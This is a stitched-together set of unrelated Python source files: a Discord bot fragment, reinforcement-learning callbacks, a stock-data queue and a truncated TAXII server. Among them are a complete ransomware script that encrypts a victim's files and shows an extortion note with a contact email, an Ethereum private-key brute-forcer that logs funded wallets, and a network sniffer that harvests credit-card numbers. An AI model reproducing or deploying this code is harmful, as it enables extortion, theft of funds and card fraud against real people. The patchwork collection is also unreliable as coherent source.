# I assume this bug is due to executing the websocket.forever function in a different thread.
def _On_error(ws, error):
pass
def _On_close(ws, close_status_code, close_msg):
mylogger.info("\nConnection closed")
mylogger.debug(f"Status: {close_status_code}")
mylogger.debug(f"Close message: {close_msg}\n")
os._exit(0)
def _Connect():
if Connection.wss is None:
# Create a file if gateway is not already cached
if os.path.isfile("url.txt") is False:
mylogger.debug("Gateway is not cached yet")
url = "https://discord.com/api/v9/gateway/bot"
resp = _RequestHTTP("GET", url)
Connection.wss = ((json.loads(resp.data)["url"]) + "?v=9&encoding=json")
with open("url.txt", "w") as f:
f.write(Connection.wss)
else:
mylogger.debug("Got the cached gateway")
with open("url.txt", "r") as f:
Connection.wss = f.readline().strip("\n")
Connection.ws = websocket.WebSocketApp(Connection.wss, on_message=_On_message, on_error=_On_error,
on_close=_On_close, on_open=_On_open)
Connection.ws.run_forever()
def Connect(token, api, guild=None, intents=None):
#websocket.enableTrace(True)
if token is not None or api is not None:
global _token
global _api
global _guild
_token = token
_api = api
_guild = guild
global intents_flag
if type(intents) == list:
for n in intents:
if n in Intents_Token:
intents_flag += Intents_Token[n]
elif intents is not None:
mylogger.fatal("Intents must be an array.")
os._exit(0)
if intents_flag == 0:
# Intents is required upon identifying, so the default is GUILDS.
intents_flag = 1
mylogger.debug(f"{intents_flag=}")
Thread(target=_Connect, daemon=True).start()
else:
mylogger.fatal("Token and api key are required.")
os._exit(0)
def _Keep_alive():
signal.signal(signal.SIGINT, _Interrupt)
    # We need this to keep the main thread alive (the websocket runs in a daemon thread),
    # so the SIGINT handler can stop the program immediately on pressing CTRL + C.
while True:
pass
# Entry point for all bot applications; this function is required to keep the program running and to execute user-defined functions.
def Main(func):
if _token is not None or _api is not None:
def wrapper(*args, **kwargs):
        # Bug-fatal: calling this too many times could cause a "too many requests" error,
        # and hitting that error too often can get your token revoked, disabling your bot.
func()
return wrapper(), _Keep_alive()
else:
mylogger.fatal("You are not connected.")
|
wallet.py
|
import threading
import os
import time
import random
import codecs
import requests
import json
from ecdsa import SigningKey, SECP256k1
import sha3
import traceback
maxPage = pow(2,256) // 128  # integer division keeps maxPage an int for random.randint()
def getRandPage():
return random.randint(1, maxPage)
def getPage(pageNum):
keyList = []
addrList = []
addrStr = ""
num = (pageNum - 1) * 50 + 1
try:
for i in range(num, num + 50):
key = hex(i)[2:]
if len(key) < 64: key = "0"*(64-len(key)) + key
priv = codecs.decode(key, 'hex_codec')
pub = SigningKey.from_string(priv, curve=SECP256k1).get_verifying_key().to_string()
addr = "0x" + sha3.keccak_256(pub).hexdigest()[24:]
keyList.append(key)
addrList.append(addr)
if len(addrStr): addrStr = addrStr + ","
addrStr = addrStr + addr
except:
pass
return [keyList, addrList, addrStr]
def getBalances(addrStr):
balances = ""
try:
r = requests.get(url='https://etherchain.org/api/account/multiple/%s' % addrStr, timeout=5)
balances = r.text
except:
return
try:
balances = json.loads(balances)
if balances['status'] != 1: raise Exception("API Busy")
balances = balances['data']
except:
print (balances)
return balances
getCount = 0
fp_found = open("found.txt", "w+")
fp_fund = open("fund.txt", "w+")
def getWallet():
global getCount
while True:
page = getRandPage()
pageRet = getPage(page)
getCount = getCount + len(pageRet[1])
try:
balancesRet = getBalances(pageRet[2])
for balance in balancesRet:
key = ""
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][i]
break
if key == "": continue
fp_found.write(str(balance['balance']) + " " + key + " " + balance['address'] + "\n")
if balance['balance'] > 0:
fp_fund.write(str(balance['balance']) + " " + key + " " + balance['address'] + "\n")
#print (balance['balance'], key, balance['address'])
fp_found.flush()
fp_fund.flush()
except:
traceback.print_exc()
continue
clearScreen()
print (getCount)
def clearScreen():
os.system('clear')
def main():
threads = []
for i in range(1):
threads.append(threading.Thread(target=getWallet,args=()))
for t in threads:
time.sleep(1.0)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
callbacks.py
|
import os
import tempfile
import time
from copy import deepcopy
from functools import wraps
from threading import Thread
from typing import Optional
import optuna
from sb3_contrib import TQC
from stable_baselines3 import SAC
from stable_baselines3.common.callbacks import BaseCallback, EvalCallback
from stable_baselines3.common.logger import TensorBoardOutputFormat
from stable_baselines3.common.vec_env import VecEnv
class TrialEvalCallback(EvalCallback):
"""
Callback used for evaluating and reporting a trial.
"""
def __init__(
self,
eval_env: VecEnv,
trial: optuna.Trial,
n_eval_episodes: int = 5,
eval_freq: int = 10000,
deterministic: bool = True,
verbose: int = 0,
best_model_save_path: Optional[str] = None,
log_path: Optional[str] = None,
):
super().__init__(
eval_env=eval_env,
n_eval_episodes=n_eval_episodes,
eval_freq=eval_freq,
deterministic=deterministic,
verbose=verbose,
best_model_save_path=best_model_save_path,
log_path=log_path,
)
self.trial = trial
self.eval_idx = 0
self.is_pruned = False
def _on_step(self) -> bool:
if self.eval_freq > 0 and self.n_calls % self.eval_freq == 0:
super()._on_step()
self.eval_idx += 1
# report best or report current ?
            # report num_timesteps or elapsed time ?
            self.trial.report(self.last_mean_reward, self.eval_idx)
            # Prune trial if needed
if self.trial.should_prune():
self.is_pruned = True
return False
return True
class SaveVecNormalizeCallback(BaseCallback):
"""
Callback for saving a VecNormalize wrapper every ``save_freq`` steps
:param save_freq: (int)
:param save_path: (str) Path to the folder where ``VecNormalize`` will be saved, as ``vecnormalize.pkl``
:param name_prefix: (str) Common prefix to the saved ``VecNormalize``, if None (default)
only one file will be kept.
"""
def __init__(self, save_freq: int, save_path: str, name_prefix: Optional[str] = None, verbose: int = 0):
super().__init__(verbose)
self.save_freq = save_freq
self.save_path = save_path
self.name_prefix = name_prefix
def _init_callback(self) -> None:
# Create folder if needed
if self.save_path is not None:
os.makedirs(self.save_path, exist_ok=True)
def _on_step(self) -> bool:
if self.n_calls % self.save_freq == 0:
if self.name_prefix is not None:
path = os.path.join(self.save_path, f"{self.name_prefix}_{self.num_timesteps}_steps.pkl")
else:
path = os.path.join(self.save_path, "vecnormalize.pkl")
if self.model.get_vec_normalize_env() is not None:
self.model.get_vec_normalize_env().save(path)
if self.verbose > 1:
print(f"Saving VecNormalize to {path}")
return True
class ParallelTrainCallback(BaseCallback):
"""
Callback to explore (collect experience) and train (do gradient steps)
at the same time using two separate threads.
Normally used with off-policy algorithms and `train_freq=(1, "episode")`.
TODO:
- blocking mode: wait for the model to finish updating the policy before collecting new experience
at the end of a rollout
- force sync mode: stop training to update to the latest policy for collecting
new experience
:param gradient_steps: Number of gradient steps to do before
sending the new policy
:param verbose: Verbosity level
:param sleep_time: Limit the fps in the thread collecting experience.
"""
def __init__(self, gradient_steps: int = 100, verbose: int = 0, sleep_time: float = 0.0):
super().__init__(verbose)
self.batch_size = 0
self._model_ready = True
self._model = None
self.gradient_steps = gradient_steps
self.process = None
self.model_class = None
self.sleep_time = sleep_time
def _init_callback(self) -> None:
temp_file = tempfile.TemporaryFile()
        # On Windows, TemporaryFile is not an io buffer,
        # so we save the model in the logs/ folder instead
if os.name == "nt":
temp_file = os.path.join("logs", "model_tmp.zip")
self.model.save(temp_file)
# TODO: add support for other algorithms
for model_class in [SAC, TQC]:
if isinstance(self.model, model_class):
self.model_class = model_class
break
assert self.model_class is not None, f"{self.model} is not supported for parallel training"
self._model = self.model_class.load(temp_file)
self.batch_size = self._model.batch_size
# Disable train method
def patch_train(function):
@wraps(function)
def wrapper(*args, **kwargs):
return
return wrapper
# Add logger for parallel training
self._model.set_logger(self.model.logger)
self.model.train = patch_train(self.model.train)
# Hack: Re-add correct values at save time
def patch_save(function):
@wraps(function)
def wrapper(*args, **kwargs):
return self._model.save(*args, **kwargs)
return wrapper
self.model.save = patch_save(self.model.save)
def train(self) -> None:
self._model_ready = False
self.process = Thread(target=self._train_thread, daemon=True)
self.process.start()
def _train_thread(self) -> None:
self._model.train(gradient_steps=self.gradient_steps, batch_size=self.batch_size)
self._model_ready = True
def _on_step(self) -> bool:
if self.sleep_time > 0:
time.sleep(self.sleep_time)
return True
def _on_rollout_end(self) -> None:
if self._model_ready:
self._model.replay_buffer = deepcopy(self.model.replay_buffer)
self.model.set_parameters(deepcopy(self._model.get_parameters()))
self.model.actor = self.model.policy.actor
if self.num_timesteps >= self._model.learning_starts:
self.train()
# Do not wait for the training loop to finish
# self.process.join()
def _on_training_end(self) -> None:
# Wait for the thread to terminate
if self.process is not None:
if self.verbose > 0:
print("Waiting for training thread to terminate")
self.process.join()
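# Usage sketch (illustrative; env and hyperparameters are placeholders):
#   model = SAC("MlpPolicy", env, train_freq=(1, "episode"))
#   model.learn(total_timesteps=100_000, callback=ParallelTrainCallback(gradient_steps=200))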
class RawStatisticsCallback(BaseCallback):
"""
Callback used for logging raw episode data (return and episode length).
"""
def __init__(self, verbose=0):
super().__init__(verbose)
        # Custom counter to report stats
# (and avoid reporting multiple values for the same step)
self._timesteps_counter = 0
self._tensorboard_writer = None
def _init_callback(self) -> None:
# Retrieve tensorboard writer to not flood the logger output
for out_format in self.logger.output_formats:
if isinstance(out_format, TensorBoardOutputFormat):
self._tensorboard_writer = out_format
assert self._tensorboard_writer is not None, "You must activate tensorboard logging when using RawStatisticsCallback"
def _on_step(self) -> bool:
for info in self.locals["infos"]:
if "episode" in info:
logger_dict = {
"raw/rollouts/episodic_return": info["episode"]["r"],
"raw/rollouts/episodic_length": info["episode"]["l"],
}
exclude_dict = {key: None for key in logger_dict.keys()}
self._timesteps_counter += info["episode"]["l"]
self._tensorboard_writer.write(logger_dict, exclude_dict, self._timesteps_counter)
return True
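# Note (illustrative): RawStatisticsCallback requires the model to be created with
# tensorboard logging enabled, e.g. SAC("MlpPolicy", env, tensorboard_log="./tb/"),
# otherwise no TensorBoardOutputFormat is present and the assert in _init_callback fails.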
|
pyscriptrunner.py
|
from subprocess import Popen, PIPE
from threading import Thread
from Queue import Queue, Empty
from multiprocessing.pool import ThreadPool
import os
import tempfile
import sys
import atexit
# Queue to keep track of stdout
io_q = Queue()
result = Queue()
def stream_watcher(identifier, stream):
for line in stream:
io_q.put((identifier, line))
result.put((identifier, line))
if not stream.closed:
stream.close()
def runprocess(code):
# declare global Popen object
global proc
global stdout_list
stdout_list = list()
# make a tmp file
f = tempfile.NamedTemporaryFile(suffix='.py', prefix='sample', delete=False)
# script.py is the name of the code passed in
f.write(code)
proc = Popen(['python', f.name], stdout=PIPE, stderr=PIPE)
Thread(target=stream_watcher, name='stdout-watcher',
args=('STDOUT', proc.stdout)).start()
Thread(target=stream_watcher, name='stderr-watcher',
args=('STDERR', proc.stderr)).start()
#Thread(target=printer, name='printer').start()
# for killing the process but not necessary for now
#atexit.register(proc.kill)
f.close()
'''
while True:
try:
stdout_list.append(result.get(True, 1))
except Empty:
break
return stdout_list
'''
return result
def printer():
# save stdout & stdin in list
while True:
try:
# Block for 1 second.
item = io_q.get(True, 1)
#print item[0] + ':' + item[1].strip('\n')
#print item
except Empty:
            # No output in either stream for a second. Are we done? Yes, if the process has exited.
if proc.poll() is not None:
break
else:
identifier, line = item
#print identifier + ':', line
#print stdout_list
'''
if __name__ == '__main__':
    code = 'print "hello"\nprint 1+2\n'
    print runprocess(code)
'''
|
Stock_source_utils.py
|
from collections import deque
from datetime import datetime
from cassandra import ConsistencyLevel
from cassandra.query import BatchStatement
from threading import Event, Thread, Timer
import time
import json
class StockDataQueue:
def __init__(self, stock_symbol, interval_type, length, c_session):
self.queue = deque()
self.length = length
self.c_session = c_session
self.interval_type = interval_type
if self.interval_type == 'sec':
self.interval = 1
elif self.interval_type == 'min':
self.interval = 60
elif self.interval_type == 'hr':
self.interval = 3600
self.H = {}
self.L = {}
for symbol in stock_symbol:
self.H[symbol] = 0
self.L[symbol] = float('inf')
def __InsertCassandraStock(self):
# symbol: str -> text, OHLC: dict (json) -> text, interval_type: str -> text, ts: datetime -> timestamp
return self.c_session.prepare(
'INSERT INTO stocks_history (OHLC,symbol,interval_type, ts) VALUES (?, ?, ?, ?)'
)
def __UpdateCassandraStock(self):
return self.c_session.prepare(
'UPDATE stocks_history SET OHLC =? WHERE symbol=? AND interval_type=? AND ts=?'
)
# Deleting data from Cassandra table
def __DeleteCassandraStock(self):
return self.c_session.prepare(
'DELETE FROM stocks_history WHERE symbol=? AND interval_type=? AND ts=?'
)
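    # Assumed Cassandra schema (illustrative, inferred from the prepared statements above):
    #   CREATE TABLE stocks_history (
    #       symbol text, interval_type text, ts timestamp, OHLC text,
    #       PRIMARY KEY ((symbol, interval_type), ts));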
def push(self, OHLCs, timestamp):
        # Sometimes there will be a missing timestamp in the queue. This is caused by the time consumed
        # when requesting stock data from the IEX API, so a later data retriever may write its data
        # before an earlier one does.
        # When there is a missing value, we supplement it with a duplicate of the current value.
        # Later, when the program responsible for that timestamp starts to write its data, it will
        # update the previously supplemented value.
        # In the other situation, if the time consumed is longer than the set interval, the data
        # retriever is forced to skip one round of data retrieval. In that case the supplemented
        # data won't be updated and will remain a copy of the value it was duplicated from.
        # There are 4 situations that can occur at the moment the data is about to be pushed into the queue:
        # 1. The latest timestamp is exactly 1 second before the current timestamp: append the current
        #    data to the end of the queue.
        # 2. The latest timestamp is earlier than the current timestamp by more than 1 second but not
        #    more than 10 seconds: duplicate the current data to supplement the missing values.
        # 3. The latest timestamp is later than the current timestamp: pop all data that is later than
        #    the current timestamp until we find a timestamp less than or equal to the current one,
        #    then handle it as situation 1 or 2.
        # 4. A large gap between the current timestamp and the last one indicates the current data is
        #    the beginning of a new day, so just append it to the end of the queue.
        # The above analysis is written for data retrieved every second; introducing the interval into
        # the code generalizes it to per-minute and per-hour data.
        # The unit of timestamp is seconds.
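        # Worked example (illustrative, interval = 1 second):
        #   queue tail timestamp = 100, push(OHLCs, 103)
        #   -> entries for 101 and 102 are supplemented with copies of the current OHLCs and 103
        #      is appended; if push(OHLCs_late, 102) arrives afterwards, the "equal timestamp"
        #      branch updates the supplemented entry for 102 in place.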
stack = []
while self.queue and self.queue[-1]['timestamp'] > timestamp:
stack.append(self.queue.pop())
        # Executing a batch of operations is faster than executing each operation individually in a loop
batch = BatchStatement(consistency_level=ConsistencyLevel.QUORUM)
if self.queue and timestamp == self.queue[-1]['timestamp']:
# modify content of the element in the queue
self.queue[-1]['OHLCs'] = OHLCs
# update data in Cassandra table "stocks_history"
dt = datetime.fromtimestamp(timestamp)
update = self.__UpdateCassandraStock()
for symbol in OHLCs.keys():
# Convert dict to json so that it can be insert into Cassandra table
OHLC_json = json.dumps(OHLCs[symbol])
batch.add(update, (OHLC_json, symbol, self.interval_type, dt))
# Update H and L
self.H[symbol] = max(OHLCs[symbol]['high'], self.H[symbol])
self.L[symbol] = min(OHLCs[symbol]['low'], self.L[symbol])
elif self.queue and timestamp - self.queue[-1]['timestamp'] < 10 * self.interval:
            # The latest timestamp is earlier than (or equal to) the current timestamp and within range:
            # supplement the intermediate missing data
latest = self.queue[-1]['timestamp']
insert = self.__InsertCassandraStock()
for t in range((timestamp - latest)//self.interval):
ts = latest + (t+1) * self.interval
self.queue.append({'OHLCs':OHLCs, 'timestamp':ts})
dt = datetime.fromtimestamp(ts)
for symbol in OHLCs.keys():
OHLC_json = json.dumps(OHLCs[symbol])
batch.add(insert, (OHLC_json, symbol, self.interval_type, dt))
if t < 1:
                        # Because they are all the same values, update H and L only once
self.H[symbol] = max(OHLCs[symbol]['high'], self.H[symbol])
self.L[symbol] = min(OHLCs[symbol]['low'], self.L[symbol])
else:
self.queue.append({'OHLCs':OHLCs, 'timestamp':timestamp})
dt = datetime.fromtimestamp(timestamp)
insert = self.__InsertCassandraStock()
for symbol in OHLCs.keys():
OHLC_json = json.dumps(OHLCs[symbol])
batch.add(insert, (OHLC_json, symbol, self.interval_type, dt))
# Update H and L
self.H[symbol] = max(OHLCs[symbol]['high'], self.H[symbol])
self.L[symbol] = min(OHLCs[symbol]['low'], self.L[symbol])
while stack:
self.queue.append(stack.pop())
        # Pop the excess data if the queue is full
        # and delete the popped data from the Cassandra table
delete = self.__DeleteCassandraStock()
while len(self.queue) > self.length:
del_data = self.queue.popleft()
dt = datetime.fromtimestamp(del_data['timestamp'])
for symbol in del_data['OHLCs'].keys():
batch.add(delete, (symbol, self.interval_type, dt))
self.c_session.execute(batch)
batch.clear()
def extract(self):
OHLCs = {}
if len(self.queue) >= 60:
O = self.queue[-60]['OHLCs']
else:
O = self.queue[0]['OHLCs']
C = self.queue[-1]['OHLCs']
for symbol in O.keys():
OHLCs[symbol] = {'close':{'price':C[symbol]['close']['price'], 'time':C[symbol]['close']['time']},
'open':{'price':O[symbol]['open']['price'], 'time':O[symbol]['open']['time']},
'high':self.H[symbol],
'low':self.L[symbol],
'symbol':symbol,
'volume':C[symbol]['volume']}
self.H[symbol] = 0
self.L[symbol] = float('inf')
return OHLCs
### Repeated program runner with accurate execution interval
class RepeatedTimer:
# Repeat function every interval seconds, stop after a given number of seconds
def __init__(self, interval, stop_after, function, *args, **kwargs):
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.start = time.time()
self.stop_at = self.start + stop_after
self.event = Event()
self.thread = Thread(target=self._target)
self.thread.start()
def _target(self):
while not self.event.wait(self._time):
if time.time() > self.stop_at:
break
self.function(*self.args, **self.kwargs)
@property
def _time(self):
return self.interval - ((time.time() - self.start) % self.interval)
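    # Example (illustrative): with interval = 5 and 12.3 s elapsed since start, _time
    # returns 5 - (12.3 % 5) = 2.7, so each tick stays aligned to start + k * interval
    # instead of drifting by the runtime of the wrapped function.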
def stop(self):
self.event.set()
self.thread.join()
|
GASRansomwareByModification.py
|
# Imports
import os # to get system root
import webbrowser # to load webbrowser to go to specific website eg bitcoin
import ctypes # so we can interact with windows dlls and change windows background etc
import urllib.request # used for downloading and saving background image
import requests # used to make get request to api.ipify.org to get target machine ip addr
import time # used to time.sleep interval for ransom note & check desktop to decrypt system/files
import datetime # to give time limit on ransom note
import win32gui
import subprocess # to create process for notepad and open ransom note
import threading # used for ransom note and decryption key on desktop
from cryptography.fernet import Fernet # encrypt/decrypt files on target system
from Crypto.PublicKey import RSA
from Crypto.Random import get_random_bytes
from Crypto.Cipher import AES, PKCS1_OAEP
import base64
class RansomWare:
localRoot: str
    # File extensions to seek out and encrypt
file_exts = [
'txt',
# We comment out 'png' so that we can see the RansomWare only encrypts specific files that we have chosen-
        # -and leaves other files unencrypted etc.
# 'png',
]
def __init__(self):
# Key that will be used for Fernet object and encrypt/decrypt method
self.key = None
# Encrypt/Decrypter
self.crypter = None
# RSA public key used for encrypting/decrypting fernet object eg, Symmetric key
self.public_key = None
        ''' Root directories to start Encryption/Decryption from
CAUTION: Do NOT use self.sysRoot on your own PC as you could end up messing up your system etc...
CAUTION: Play it safe, create a mini root directory to see how this software works it is no different
CAUTION: eg, use 'localRoot' and create Some folder directory and files in them folders etc.
'''
# Use sysroot to create absolute path for files, etc. And for encrypting whole system
self.sysRoot = os.path.expanduser('~')
        # Use localroot to test encryption software and for absolute path for files and encryption of "test system"
self.localRoot = 'C:\\Users\\jojo\\Desktop\\test\\' # Debugging/Testing
# Get public IP of person, for more analysis etc. (Check if you have hit gov, military ip space LOL)
self.publicIP = requests.get('https://api.ipify.org').text
# Generates [SYMMETRIC KEY] on victim machine which is used to encrypt the victims data
def generate_key(self):
# Generates a url safe(base64 encoded) key
self.key = Fernet.generate_key()
# Creates a Fernet object with encrypt/decrypt methods
self.crypter = Fernet(self.key)
# Write the fernet(symmetric key) to text file
def write_key(self):
with open('fernet_key.txt', 'wb') as f:
f.write(self.key)
# Encrypt [SYMMETRIC KEY] that was created on victim machine to Encrypt/Decrypt files with our PUBLIC ASYMMETRIC-
    # -RSA key that was created on OUR MACHINE. We will later be able to DECRYPT the SYMMETRIC KEY used for-
# -Encrypt/Decrypt of files on target machine with our PRIVATE KEY, so that they can then Decrypt files etc.
def encrypt_fernet_key(self):
with open('fernet_key.txt', 'rb') as fk:
fernet_key = fk.read()
with open('fernet_key.txt', 'wb') as f:
# Public RSA key
self.public_key = RSA.import_key(open('public.pem').read())
# Public encrypter object
public_crypter = PKCS1_OAEP.new(self.public_key)
# Encrypted fernet key
enc_fernent_key = public_crypter.encrypt(fernet_key)
# Write encrypted fernet key to file
f.write(enc_fernent_key)
        # Write encrypted fernet key to desktop as well so they can send this file to be decrypted and get their system/files back
with open(f'{self.sysRoot}/Desktop/EMAIL_ME.txt', 'wb') as fa:
fa.write(enc_fernent_key)
# Assign self.key to encrypted fernet key
self.key = enc_fernent_key
# Remove fernet crypter object
self.crypter = None
# [SYMMETRIC KEY] Fernet Encrypt/Decrypt file - file_path:str:absolute file path eg, C:/Folder/Folder/Folder/Filename.txt
def crypt_file(self, file_path, encrypted=False):
with open(file_path, 'rb') as f:
# Read data from file
data = f.read()
if not encrypted:
# Print file contents - [debugging]
print(data)
# Encrypt data from file
_data = self.crypter.encrypt(data)
# Log file encrypted and print encrypted contents - [debugging]
                print('> File encrypted')
print(_data)
else:
# Decrypt data from file
_data = self.crypter.decrypt(data)
# Log file decrypted and print decrypted contents - [debugging]
                print('> File decrypted')
print(_data)
with open(file_path, 'wb') as fp:
# Write encrypted/decrypted data to file using same filename to overwrite original file
fp.write(_data)
# [SYMMETRIC KEY] Fernet Encrypt/Decrypt files on system using the symmetric key that was generated on victim machine
def crypt_system(self, encrypted=False):
# put all the file names that are in the directory in a list
files = os.listdir(self.localRoot)
c = 0
# append the whole path to each file name
for i in files:
files[c] = self.localRoot + i
c += 1
        # sort the files by last modification time
files.sort(key=lambda f: os.stat(f).st_mtime, reverse=False)
for file in files:
# check the extension of the file
if not file.split('.')[-1] in self.file_exts:
continue
if not encrypted:
time.sleep(0.2)
self.crypt_file(file)
else:
self.crypt_file(file, encrypted=True)
@staticmethod
def what_is_bitcoin():
url = 'https://bitcoin.org'
# Open browser to the https://bitcoin.org so they know what bitcoin is
webbrowser.open(url)
def change_desktop_background(self):
imageUrl = 'https://techgenix.com/tgwordpress/wp-content/uploads/2016/09/Guy-fawkes-e1474441663786.png'
# Go to specif url and download+save image using absolute path
path = f'{self.sysRoot}/Desktop/background.jpg'
urllib.request.urlretrieve(imageUrl, path)
SPI_SETDESKWALLPAPER = 20
        # Access windows dlls for functionality, e.g. changing desktop wallpaper
ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, path, 0)
def ransom_note(self):
        date = datetime.date.today().strftime('%d-%B-%Y')
with open('RANSOM_NOTE.txt', 'w') as f:
f.write(f'''
    The hard disks of your computer have been encrypted with a military grade encryption algorithm.
There is no way to restore your data without a special key.
Only we can decrypt your files!
To purchase your key and restore your data, please follow these three easy steps:
    1. Email the file called EMAIL_ME.txt at {self.sysRoot}/Desktop/EMAIL_ME.txt to GetYourFilesBack@protonmail.com
    2. You will receive your personal BTC address for payment.
Once payment has been completed, send another email to GetYourFilesBack@protonmail.com stating "PAID".
We will check to see if payment has been paid.
3. You will receive a text file with your KEY that will unlock all your files.
IMPORTANT: To decrypt your files, place text file on desktop and wait. Shortly after it will begin to decrypt all files.
WARNING:
    Do NOT attempt to decrypt your files with any software as it is obsolete and will not work, and may cost you more to unlock your files.
    Do NOT change file names, mess with the files, or run decryption software as it will cost you more to unlock your files-
    -and there is a high chance you will lose your files forever.
    Do NOT send "PAID" without paying, price WILL go up for disobedience.
    Do NOT think that we won't delete your files altogether and throw away the key if you refuse to pay. WE WILL.
''')
def show_ransom_note(self):
# Open the ransom note
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
count = 0 # Debugging/Testing
while True:
time.sleep(0.1)
top_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
if top_window == 'RANSOM_NOTE - Notepad':
print('Ransom note is the top window - do nothing') # Debugging/Testing
pass
else:
print('Ransom note is not the top window - kill/create process again') # Debugging/Testing
                # Kill ransom note so we can open it again and make sure ransom note is in the foreground (top of all windows)
time.sleep(0.1)
ransom.kill()
# Open the ransom note
time.sleep(0.1)
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
# sleep for 10 seconds
time.sleep(10)
count += 1
if count == 1:
break
# Decrypts system when text file with un-encrypted key in it is placed on dekstop of target machine
def put_me_on_desktop(self):
# Loop to check file and if file it will read key and then self.key + self.cryptor will be valid for decrypting-
# -the files
print('started') # Debugging/Testing
while True:
try:
print('trying') # Debugging/Testing
                # The ATTACKER decrypts the fernet symmetric key on their machine and then puts the un-encrypted fernet-
                # -key in this file and sends it in an email to the victim. They then put this on the desktop and it will be-
                # -used to un-encrypt the system. AT NO POINT DO WE GIVE THEM THE PRIVATE ASYMMETRIC KEY etc.
with open(f'{self.sysRoot}/Desktop/PUT_ME_ON_DESKTOP.txt', 'r') as f:
self.key = f.read()
self.crypter = Fernet(self.key)
# Decrpyt system once have file is found and we have cryptor with the correct key
self.crypt_system(encrypted=True)
print('decrypted') # Debugging/Testing
break
except Exception as e:
print(e) # Debugging/Testing
pass
            time.sleep(5) # Debugging/Testing: check for file on desktop every 5 seconds
print('Checking for PUT_ME_ON_DESKTOP.txt') # Debugging/Testing
# Would use below code in real life etc... above 10secs is just to "show" concept
# Sleep ~ 3 mins
# secs = 60
# mins = 3
# time.sleep((mins*secs))
def main():
# testfile = r'D:\Coding\Python\RansomWare\RansomWare_Software\testfile.png'
rw = RansomWare()
rw.generate_key()
rw.crypt_system()
rw.write_key()
rw.encrypt_fernet_key()
rw.change_desktop_background()
rw.what_is_bitcoin()
rw.ransom_note()
t1 = threading.Thread(target=rw.show_ransom_note)
t2 = threading.Thread(target=rw.put_me_on_desktop)
t1.start()
print('> RansomWare: Attack completed on target machine and system is encrypted') # Debugging/Testing
print(
'> RansomWare: Waiting for attacker to give target machine document that will un-encrypt machine') # Debugging/Testing
t2.start()
print('> RansomWare: Target machine has been un-encrypted') # Debugging/Testing
print('> RansomWare: Completed') # Debugging/Testing
if __name__ == '__main__':
main()
|
CCWatcher.py
|
import re
import sys
import logging
import argparse
import requests
from scapy.all import *
from colorama import init
from threading import Thread
from termcolor import colored
#Color Windows
init()
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def arguments():
parser = argparse.ArgumentParser(description = 'Network Sniffer Tool, to find unencrypted Credit Card data.')
parser.add_argument('-i', '--iface', action = 'store', dest = 'iface',required = True, help = 'Interface to sniff')
parser.add_argument('-f', '--filter', action = 'store', dest = 'filter', default='tcp', required = False, help = 'Filter in wireshark style. Ex.: "tcp and port 80"')
    parser.add_argument('-rf', '--regex-file', action = 'store', dest = 'regex_file', default='regex_cc.txt',required = False, help = 'File with regex rules to find Credit Card data')
    parser.add_argument('-r', '--regex', action = 'store', dest = 'regex', required = False, help = 'Single regex to find additional information')
parser.add_argument('-o', '--output', action = 'store', dest = 'output', default='credit_cards_output.txt',required = False, help = 'Output file where creditcards infos will be stored')
parser.add_argument('-l', '--log', action = 'store', dest = 'log', default='ccwatcher.log',required = False, help = 'Output file where log will be stored')
return parser.parse_args()
def save_cc(results):
for result in results:
f = open(args.output,'a')
f.write('Credit Card number: '+result+'\n')
url = 'https://binlist.net/json/%s' % result
r = requests.get(url)
for key,value in r.json().items():
msg = '%s\t\t\t%s\n' % (key,value)
f.write(msg)
f.write('-'*50+'\n')
f.close()
def regex_gen():
if args.regex:
return re.compile(args.regex)
else:
x = dict()
for regex in open(args.regex_file):
regex = regex.split(':',1)
x[regex[0]]=regex[1]
return x
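# Illustrative regex_cc.txt format (one "name:pattern" line per entry; the patterns
# below are common card-number examples, not taken from the shipped file):
#   visa:4[0-9]{12}(?:[0-9]{3})?
#   mastercard:5[1-5][0-9]{14}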
def verify(data):
for cc,pattern in patterns.items():
result = re.findall(pattern.strip(),data,re.MULTILINE)
if len(result) > 0:
t = Thread(target=save_cc, args=(result,))
t.start()
return result
def monitor(pkt):
data = str()
if 'TCP' in pkt and pkt[TCP].payload:data = str(pkt[TCP].payload)
elif pkt.getlayer(Raw):data = pkt.getlayer(Raw).load
if data:
cc = verify(data)
if cc:
logger.info(colored('\nCredit Cards Numbers\n%s', 'white', 'on_green') % ' | '.join(cc))
logger.info("\n%s:%s============>%s:%s" % (pkt[IP].src,pkt[IP].sport,pkt[IP].dst,pkt[IP].dport))
logger.info("\n"+data)
args = arguments()
# create a file handler
handler = logging.FileHandler(args.log)
handler.setLevel(logging.INFO)
logger.addHandler(handler)
patterns = regex_gen()
sniff(prn=monitor,iface=args.iface,filter=args.filter,count=0)
|
TAXIIServer.py
|
import demistomock as demisto
from CommonServerPython import *
from flask import Flask, request, make_response, Response, stream_with_context
from gevent.pywsgi import WSGIServer
from urllib.parse import urlparse, ParseResult
from tempfile import NamedTemporaryFile
from base64 import b64decode
from typing import Callable, List, Generator
from ssl import SSLContext, SSLError, PROTOCOL_TLSv1_2
from multiprocessing import Process
from werkzeug.datastructures import Headers
from libtaxii.messages_11 import (
TAXIIMessage,
DiscoveryRequest,
DiscoveryResponse,
CollectionInformationRequest,
CollectionInformation,
CollectionInformationResponse,
PollRequest,
PollingServiceInstance,
ServiceInstance,
ContentBlock,
generate_message_id,
get_message_from_xml)
from libtaxii.constants import (
MSG_COLLECTION_INFORMATION_REQUEST,
MSG_DISCOVERY_REQUEST,
MSG_POLL_REQUEST,
SVC_DISCOVERY,
SVC_COLLECTION_MANAGEMENT,
SVC_POLL,
CB_STIX_XML_11
)
from cybox.core import Observable
from requests.utils import requote_uri
import functools
import stix.core
import stix.indicator
import stix.extensions.marking.ais
import stix.data_marking
import stix.extensions.marking.tlp
import cybox.objects.address_object
import cybox.objects.domain_name_object
import cybox.objects.uri_object
import cybox.objects.file_object
import mixbox.idgen
import mixbox.namespaces
import netaddr
import uuid
import werkzeug.urls
import pytz
''' GLOBAL VARIABLES '''
INTEGRATION_NAME: str = 'TAXII Server'
PAGE_SIZE = 200
APP: Flask = Flask('demisto-taxii')
